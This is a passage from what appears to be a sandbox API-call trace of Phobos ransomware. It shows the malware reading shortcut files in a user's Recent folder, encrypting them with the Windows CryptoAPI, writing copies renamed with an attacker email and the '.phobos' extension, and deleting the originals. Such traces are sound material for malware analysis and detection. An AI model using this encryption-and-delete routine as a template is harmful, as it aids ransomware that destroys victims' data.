halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.898] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.898] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.898] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.899] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x959, lpOverlapped=0x0) returned 1 [0200.900] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x960, dwBufLen=0x960 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x960) returned 1 [0200.900] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x960, lpOverlapped=0x0) returned 1 [0200.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0200.901] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.901] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.901] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.901] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.901] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.901] CloseHandle (hObject=0x178) returned 1 [0200.901] CloseHandle (hObject=0x124) returned 1 [0200.901] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LCY7v.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lcy7v.lnk")) returned 1 [0200.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.936] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2581) returned 1 [0200.936] CloseHandle (hObject=0x160) returned 1 [0200.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk")) returned 0x20 [0200.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.145] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.145] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.146] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.146] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.146] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa15, lpOverlapped=0x0) returned 1 [0201.149] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20, dwBufLen=0xa20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20) returned 1 [0201.149] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa20, lpOverlapped=0x0) returned 1 [0201.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0201.150] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.150] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0201.150] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.150] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0201.150] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.150] CloseHandle (hObject=0x174) returned 1 [0201.150] CloseHandle (hObject=0x160) returned 1 [0201.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lihhDR8PcnPVBXcF0WOr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lihhdr8pcnpvbxcf0wor.lnk")) returned 1 [0201.152] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.153] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3943) returned 1 [0201.153] CloseHandle (hObject=0x160) returned 1 [0201.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk")) returned 0x20 [0201.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.153] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.153] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.154] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.154] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf67, lpOverlapped=0x0) returned 1 [0201.155] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf70, dwBufLen=0xf70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf70) returned 1 [0201.156] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf70, lpOverlapped=0x0) returned 1 [0201.156] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0201.156] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.156] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.156] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.156] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.157] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.157] CloseHandle (hObject=0x160) returned 1 [0201.157] CloseHandle (hObject=0x174) returned 1 [0201.157] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\M3UR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\m3ur.lnk")) returned 1 [0201.158] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.159] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=619) returned 1 [0201.159] CloseHandle (hObject=0x174) returned 1 [0201.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk")) returned 0x20 [0201.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.159] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.159] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.160] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.160] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x26b, lpOverlapped=0x0) returned 1 [0201.161] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270, dwBufLen=0x270 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270) returned 1 [0201.161] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x270, lpOverlapped=0x0) returned 1 [0201.162] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0201.162] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.162] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0201.162] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.162] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0201.162] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.162] CloseHandle (hObject=0x174) returned 1 [0201.162] CloseHandle (hObject=0x160) returned 1 [0201.162] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mJth_o7FSbH0UAsev5.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mjth_o7fsbh0uasev5.flv.lnk")) returned 1 [0201.163] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.165] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2393) returned 1 [0201.165] CloseHandle (hObject=0x160) returned 1 [0201.165] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk")) returned 0x20 [0201.165] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.165] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.165] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.166] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.166] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.166] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x959, lpOverlapped=0x0) returned 1 [0201.167] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x960, dwBufLen=0x960 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x960) returned 1 [0201.167] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x960, lpOverlapped=0x0) returned 1 [0201.168] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0201.168] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.168] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.168] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.168] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.168] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.168] CloseHandle (hObject=0x160) returned 1 [0201.168] CloseHandle (hObject=0x174) returned 1 [0201.168] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mRIEH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\mrieh.lnk")) returned 1 [0201.169] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.170] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1322) returned 1 [0201.170] CloseHandle (hObject=0x174) returned 1 [0201.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk")) returned 0x20 [0201.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 